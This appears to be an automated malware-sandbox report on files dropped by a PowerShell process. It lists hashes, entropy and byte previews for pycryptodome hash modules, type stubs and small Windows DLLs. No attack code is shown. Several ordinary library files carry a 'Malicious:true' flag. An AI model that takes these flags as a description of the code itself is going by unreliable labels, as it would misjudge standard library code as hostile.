                                                                                                                                                                                                                              SHA1:0C0999B2EC57F8415DA5AB6FA75EC6011892C420
                                                                                                                                                                                                                              SHA-256:3203761193E6876FC3AC0AE16B3A6A1CB22747740B4F0AF46C8BD69A49B67B2B
                                                                                                                                                                                                                              SHA-512:DF2BB75CAE76D89BD360AEE47D29F182644BB274C7771195A5F340C72119527455D4B5EAAB575451E59515480938C3B105BF8FA5877CABCF54DFFC373849F5D1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf..........................r.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z...G.d...d.e.........Z.d.d...Z.d.Z.d.Z.d...Z.y.)......)...bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA512a..... int SHA512_init(void **shaState,. size_t digest_size);. int SHA512_destroy(void *shaState);. int SHA512_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA512_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA512_copy(const void *src, void *dst);.. int SHA512_pbkdf2_hmac_assist(const void *inner,.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4085
                                                                                                                                                                                                                              Entropy (8bit):5.3339471505789735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:U4ykviSIKt+OLBwZcH8XHghIn57s3V2YqypAv:U+UOL2dgA5V4pAv
                                                                                                                                                                                                                              MD5:7913A7A1560F8FB66CE8CD101700EE81
                                                                                                                                                                                                                              SHA1:8F6349E2F8E7F6C0D3EEF7CC3F5D1DFBAAACDE28
                                                                                                                                                                                                                              SHA-256:358CCD075290A6FFEB928E3925FA1DF707286F6AA528FFC70442B2EBD295513A
                                                                                                                                                                                                                              SHA-512:C36E87CCDF0F2A268A1951FABB37AA1BAAA35D5A1527C495736DAC04DC16F70E6252F5A1D0E54553A398B34FDAFEEBB89537BE1E11AD0DE5CC9DAF14988855A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf..........................b.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.y.)......)...bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubyte)..._raw_keccak_libc.....................0.....e.Z.d.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d.d...Z.y.)...SHAKE128_XOFz.A SHAKE128 hash object.. Do not instantiate directly.. Use the :func:`new` function... :ivar oid: ASN.1 Object ID. :vartype oid: string. z.2.16.840.1.101.3.4.2.11Nc.....................D.....t.................}.t.........j...................|.j...........................t.........d.........t.........d.................}.|.r.t.........d.|.z.............t.........|.j...........................t.........j...........................|._.........d.|._.........d.|._.........|.r.|.j...................|...........y.y.).N. ........z%Error %d while instantiating SHAKE128F.....).r....r......keccak_i
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4085
                                                                                                                                                                                                                              Entropy (8bit):5.33626938030753
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:F04ykviG/Kt+eLBQp0HiEghInFbK3g2EDypAV:F0dUeLyigAFYxpAV
                                                                                                                                                                                                                              MD5:63D7F7F7189A4E23BF10CE1E462D21DE
                                                                                                                                                                                                                              SHA1:8E7DF1492660EC0A12776265A74A046476CFB139
                                                                                                                                                                                                                              SHA-256:5F7EAC39E77F47508B46BB4C3BC897BE5DAD62D280138EE3A431E49C111C4E02
                                                                                                                                                                                                                              SHA-512:D2151DF923690A01F61E16CB670FFCDA99E0239522EC3FD9124DF169B7CBA1C7B46C10986CE6D6D55B754C7D1CE41448B38853881291333C63F74967ECC2F9F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf..........................b.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d.d...Z.y.)......)...bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubyte)..._raw_keccak_libc.....................0.....e.Z.d.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d.d...Z.y.)...SHAKE256_XOFz.A SHAKE256 hash object.. Do not instantiate directly.. Use the :func:`new` function... :ivar oid: ASN.1 Object ID. :vartype oid: string. z.2.16.840.1.101.3.4.2.12Nc.....................D.....t.................}.t.........j...................|.j...........................t.........d.........t.........d.................}.|.r.t.........d.|.z.............t.........|.j...........................t.........j...........................|._.........d.|._.........d.|._.........|.r.|.j...................|...........y.y.).N.@........z%Error %d while instantiating SHAKE256F.....).r....r......keccak_i
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4438
                                                                                                                                                                                                                              Entropy (8bit):5.373849079581438
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ti6/vBU4YKYKWRahk9HQJoqzVT+D7ToIjCcmlI//8gP3KZGC:tzuQ0I9oqJe6NmBP3XC
                                                                                                                                                                                                                              MD5:68A9CE3DAE300586D71BC95576CAA78E
                                                                                                                                                                                                                              SHA1:20839D75DA76D213D61113CD8A74842D59B55FD4
                                                                                                                                                                                                                              SHA-256:62DD90833C4EA42ABA19ABAD16D06F2E40BE97B84D6420F1DC1D314074188343
                                                                                                                                                                                                                              SHA-512:EFAE78C886D63F2B77BA4C0D1236139A6ACF2E8C947007D036335C7B30E2B2CB365C0A1932A47F05F335D89DA75731BB81AE603D5EA44615C2B1BB534EA3B40F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf..........................P.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....G.d...d.e.........Z.d...Z.y.)......)...bord..is_bytes..tobytes.....)...cSHAKE128)..._encode_str.._right_encodec...........................e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...TupleHashz\A Tuple hash object.. Do not instantiate directly.. Use the :func:`new` function.. c.....................P.....|.|._.........|.j...................d.|.d.........|._.........d.|._.........y.).N.....s....TupleHash)...digest_size.._new.._cshake.._digest)...self..custom..cshaker....s.... .IC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Hash/TupleHash128.py..__init__z.TupleHash.__init__+...s%.......&.........{.{.3......=...........r....c..........................|.j.....................t.........d...........|.D.]<..}.t.........|.........s.t.........d...........|.j...................j...................t.........|....................>..|.S.).z.Authenticate the next tuple of byte strings.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1548
                                                                                                                                                                                                                              Entropy (8bit):5.59355687045503
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:iO/+DeGToWxGGpYcXlI/dBgNPWTSKhsskFn:1+DrToIjCcXlI/dBAP3Ka
                                                                                                                                                                                                                              MD5:F8598B494A8871AC363E2883C38CF03B
                                                                                                                                                                                                                              SHA1:1A26CB491BE7DF18B70775A8B4F59250A17300EF
                                                                                                                                                                                                                              SHA-256:DB1AF1CB40EAB12225C68C697AB8543D403C187E0CA0FA4E9ABAD7767F03E0BB
                                                                                                                                                                                                                              SHA-512:4F365383AED8C0E5A5B1D153E9B013ACADD26A27C9941122843BBAD6B63B6A8731C74584956E1FB653D906EDF9F8D9DD97D063E08DB3C768E2E664432F103F45
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.VfV.........................".....d.d.l.m.Z...d.d.l.m.Z...d...Z.y.)......)...cSHAKE256)...TupleHashc...........................|.j...................d.d.........}.|.j...................d.d.........}.d.|.|.f.v.r.t.........d...........d.|.|.f.k(..r.d.}.|...|.d.k...r%t.........d...........|.d.k...s.|.d.z...r.t.........d...........|.d.z...}.|.j...................d.d.........}.t.........|.t.........|.........S.).a....Create a new TupleHash256 object... Args:. digest_bytes (integer):. Optional. The size of the digest, in bytes.. Default is 64. Minimum is 8.. digest_bits (integer):. Optional and alternative to ``digest_bytes``.. The size of the digest, in bits (and in steps of 8).. Default is 512. Minimum is 64.. custom (bytes):. Optional.. A customization bytestring (``S`` in SP 800-185)... :Return: A :class:`TupleHash` object. ..digest_bytesN..digest_bitsz*Only one digest parameter must be provided).NN.@..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4914
                                                                                                                                                                                                                              Entropy (8bit):5.282746895838318
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:rlkv+0lIU0dBeXkTHpRxSghInOfTlQWALH2ASk6VPd9Bc:rXvEpgAOYHJ
                                                                                                                                                                                                                              MD5:C124827C1D0CA8054905A63ADDE8C64C
                                                                                                                                                                                                                              SHA1:CA4EF559E9E07383C84D8D25357F6CACC8F6607E
                                                                                                                                                                                                                              SHA-256:81480ADE8209D2326D5B5CE369DE5B5C6B35AAA3584E2979527E18C5452BB34E
                                                                                                                                                                                                                              SHA-512:01D9CBADA6DA09814FE40ED16F04FE9BA63B85EAF64528E3B689E2AE8C826C887EC3A6BB862D32B304B297CDD515174D62860210931E50F73BD0BB7B2BB4E5E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vfk.........................h.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d...Z.y.)......)...VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubyte)...long_to_bytes)...bchr.....)..._raw_keccak_libc.....................0.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.y.)...TurboSHAKEzaA TurboSHAKE hash object.. Do not instantiate directly.. Use the :func:`new` function.. c.....................R.....t.................}.t.........j...................|.j...........................t.........|.........t.........d.................}.|.r.t.........d.|.z.............t.........|.j...........................t.........j...........................|._.........d.|._.........|.|._.........|.|._.........|.r.|.j...................|...........y.y.).N.....z'Error %d while instantiating TurboSHAKEF).r....r......keccak_init..address_ofr....r......ValueErrorr......get..keccak_destroy.._state.._is
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1080
                                                                                                                                                                                                                              Entropy (8bit):5.495595238411678
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:z7ytyz4tGH25mSkdUpVP18/gWq8X8KNBfmimC5zB:HywktGH2USk6VPshBBeKzB
                                                                                                                                                                                                                              MD5:50E25B4482447EF0B2BEE93126C30DEF
                                                                                                                                                                                                                              SHA1:C96C5719B23099F64F32D06C9942DB41580F8594
                                                                                                                                                                                                                              SHA-256:4712D57472823F17989B06440DE67BBD39960528AC2B1F6B01D798AEFB45DEBE
                                                                                                                                                                                                                              SHA-512:246B31491D847B9D5D0C1F25B68D238739F28F2B812D7744696D65E40FCDA9BE9CB2B03C1286C5CDF55426E257095785B90D80C6E40B39241306FD153FF24469
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf................................d.d.l.m.Z...d...Z.y.)......)...TurboSHAKEc..........................|.j...................d.d.........}.d.|.c.x.k...r.d.k...s.n...t.........d.|.z.............|.j...................d.........}.t.........d.|.|...........S.).a....Create a new TurboSHAKE256 object... Args:. domain (integer):. Optional - A domain separation byte, between 0x01 and 0x7F.. The default value is 0x1F.. data (bytes/bytearray/memoryview):. Optional - The very first chunk of the message to hash.. It is equivalent to an early call to :meth:`update`... :Return: A :class:`TurboSHAKE` object. ..domain.....r.........z&Incorrect domain separation value (%d)..data.@...).r....)...get..ValueErrorr....)...kwargs..domain_separationr....s.... .JC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Hash/TurboSHAKE256.py..newr........sY...............8.T..2........%..-....-.....A..*....+....,....,....:.:.f....D....b..+.$..7..7.....N)
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7030
                                                                                                                                                                                                                              Entropy (8bit):5.218843055539626
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:HQ0ykv5FgZ5CFc8BfMs85H0vevzdzlssv0U1DoJ2py1RR7RoLBvRlYPlPNFJyWaq:HzZFc8pUb9lssvESy1T1mjYPFNGW1
                                                                                                                                                                                                                              MD5:30FB33113E8129A7ABC8A0FCED980291
                                                                                                                                                                                                                              SHA1:844F120BA0047B96432ACB9F9543FD4E6C2C1185
                                                                                                                                                                                                                              SHA-256:98147966ACCF1D130815FA69BCE5B167225EC93F3E94FBA869A96191B172CB56
                                                                                                                                                                                                                              SHA-512:72A25165D03BB911BD84DE21A2297E8086BB9FFFC7A1F142A277CFF89DDED169BC8BFC5A0A5E537A3E46987D7914960BBCFCD93FFF63F9270B8A816EC53F1D69
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf,.........................f.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z...G.d...d.e.........Z.d...Z.y.)......)...bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubytez.Crypto.Hash._keccaka..... int keccak_init(void **state,. size_t capacity_bytes,. uint8_t rounds);. int keccak_destroy(void *state);. int keccak_absorb(void *state,. const uint8_t *in,. size_t len);. int keccak_squeeze(const void *state,. uint8_t *out,. size_t len,. uint8_t padding);. int keccak_digest(void *sta
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12800
                                                                                                                                                                                                                              Entropy (8bit):4.999870226643325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:DzFRF/1nb2mhQtk4axusjfkgZhoYDQgRjcqgQvEty:DzFd2f64axnTTz5D1gQvEty
                                                                                                                                                                                                                              MD5:C89BECC2BECD40934FE78FCC0D74D941
                                                                                                                                                                                                                              SHA1:D04680DF546E2D8A86F60F022544DB181F409C50
                                                                                                                                                                                                                              SHA-256:E5B6E58D6DA8DB36B0673539F0C65C80B071A925D2246C42C54E9FCDD8CA08E3
                                                                                                                                                                                                                              SHA-512:715B3F69933841BAADC1C30D616DB34E6959FD9257D65E31C39CD08C53AFA5653B0E87B41DCC3C5E73E57387A1E7E72C0A668578BD42D5561F4105055F02993C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13312
                                                                                                                                                                                                                              Entropy (8bit):5.025153056783597
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:AF/1nb2mhQtks0iiNqdF4mtPjD02A5APYcqgYvEL2x:62f6fFA/4GjDFcgYvEL2x
                                                                                                                                                                                                                              MD5:C4CC05D3132FDFB05089F42364FC74D2
                                                                                                                                                                                                                              SHA1:DA7A1AE5D93839577BBD25952A1672C831BC4F29
                                                                                                                                                                                                                              SHA-256:8F3D92DE840ABB5A46015A8FF618FF411C73009CBAA448AC268A5C619CF84721
                                                                                                                                                                                                                              SHA-512:C597C70B7AF8E77BEEEBF10C32B34C37F25C741991581D67CF22E0778F262E463C0F64AA37F92FBC4415FE675673F3F92544E109E5032E488F185F1CFBC839FE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                              Entropy (8bit):5.235115741550938
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
                                                                                                                                                                                                                              MD5:1E201DF4B4C8A8CD9DA1514C6C21D1C4
                                                                                                                                                                                                                              SHA1:3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
                                                                                                                                                                                                                              SHA-256:A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
                                                                                                                                                                                                                              SHA-512:19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15360
                                                                                                                                                                                                                              Entropy (8bit):5.133714807569085
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
                                                                                                                                                                                                                              MD5:76C84B62982843367C5F5D41B550825F
                                                                                                                                                                                                                              SHA1:B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
                                                                                                                                                                                                                              SHA-256:EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
                                                                                                                                                                                                                              SHA-512:03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6550
                                                                                                                                                                                                                              Entropy (8bit):4.889437799325704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Nqrskrs9t3q/IQ14i44sZ3x6Bki1DC/imkL:krskrs9VqcVYDt
                                                                                                                                                                                                                              MD5:C1D439DDBFB7743AB178FFC1860B3C49
                                                                                                                                                                                                                              SHA1:E7036F22D605E27B82BDD441DB1450D8E203E1F7
                                                                                                                                                                                                                              SHA-256:25255524B26D401F859A162E6271277370F87F2AD42B94BFA27FA98BF15536B7
                                                                                                                                                                                                                              SHA-512:85255ABE9BAAEB7FF7ECF4A6790D0B0F6DE3FB2BB0EA5B46BD3FBCF0C167C8E1F25EAEFB45B3BD94F1F22225D4F15144C1236A43403F700D0CB9C28DD8E33EE6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):513
                                                                                                                                                                                                                              Entropy (8bit):4.65254840298011
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3AJ1ApWaN5hFeLBaFeLsQwWh72CX5AJaNi4Y:1REcT34A1N56Vp7h71GENiL
                                                                                                                                                                                                                              MD5:650178B2B4C1BBE35CB633D193929B0B
                                                                                                                                                                                                                              SHA1:08A93F8C458ED63BB136821EF52ADF04B70C02A8
                                                                                                                                                                                                                              SHA-256:996DE23B6A41D7158B3C0DD8B3DE5DE532F6953706640866CBE19243A882F3A3
                                                                                                                                                                                                                              SHA-512:628B50274BDFA31ABCA9D06A433C493C0953C3F8BBB4949BC83EBF370F383F182D80DAF12850388F0B0EB0D989A6CA3E34329CFF9FB8051F4E649DA6F47B8C3E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class cSHAKE_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. function: Optional[bytes] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> cSHAKE_XOF: ..... def read(self, length: int) -> bytes: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2258
                                                                                                                                                                                                                              Entropy (8bit):5.32151039741095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:MMWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+f+dywQWVfxMxC4GIAacQWVa:MMDqrYJALrYJHdt3EHGuIWK4mWVJMQEL
                                                                                                                                                                                                                              MD5:9595C708A747BEBEC78D587B98118FA7
                                                                                                                                                                                                                              SHA1:A007C6E687D054CFD418D12399C8424116171290
                                                                                                                                                                                                                              SHA-256:32810B278FB43848BEDBF75D04AFC4C081D544BC512FEB2CE119ED010301C964
                                                                                                                                                                                                                              SHA-512:7514E8613909021A4E7F9F5D61E0C43822CD4021B21566528DA241E9C30B5DB72875AF4AE1A3763563E464875AD400D8CAC3DD124C88516CE4577C618CB8E8D0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):239
                                                                                                                                                                                                                              Entropy (8bit):5.024092138608156
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYBXy1+txtQORyoczrIY3MTDyJaNyRD4JRQ:1REYBC+t8FHvIY3YyJaNi4Y
                                                                                                                                                                                                                              MD5:20ADE99CAEE7A7470D7F06423C91497F
                                                                                                                                                                                                                              SHA1:6DDBD7AC33D5777F69B03C9FC201872959DC7C50
                                                                                                                                                                                                                              SHA-256:C4B4B0E07985F4C8338D8ABF9803AC1A46F8D1D579B237E207D06D47D1199C18
                                                                                                                                                                                                                              SHA-512:A10381306BC87E08F780C199DAD52473288319E8EAD9C50C49ABEC1D3257EF783B954F41D5E4EB4F551CADB219CC67153FBD9FA454CC724541C06510B3B10892
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....from Crypto.Hash.cSHAKE128 import cSHAKE_XOF....Buffer = Union[bytes, bytearray, memoryview]....def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7724
                                                                                                                                                                                                                              Entropy (8bit):4.640445445125216
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:M7DqrYJALrYJHdt3EHGuIWHgkIPqg9Ss8J8lixIVmkO/YZ3RUaIDrFX2dlPcQ:4qrskrs9t3q/I2gnli7kO/YBiMUQ
                                                                                                                                                                                                                              MD5:EC2B85AAC10E4BEE0F1D2920F7B198E9
                                                                                                                                                                                                                              SHA1:1C01AE68A7B76914047BD63EED135F94FA218D76
                                                                                                                                                                                                                              SHA-256:E2B3E86D48CA669585E69F0320653E8D7712144BB31548C4D451E957C76B2CB6
                                                                                                                                                                                                                              SHA-512:1C837AA8479AB17022CB4ABBC59DFB7A279272B90027A97F036987748885AB1C3157BB622BE03D9A6C74AC01ED6339349F15548A778EAFB72B52F35C03AE68B3
                                                                                                                                                                                                                              Malicious:true
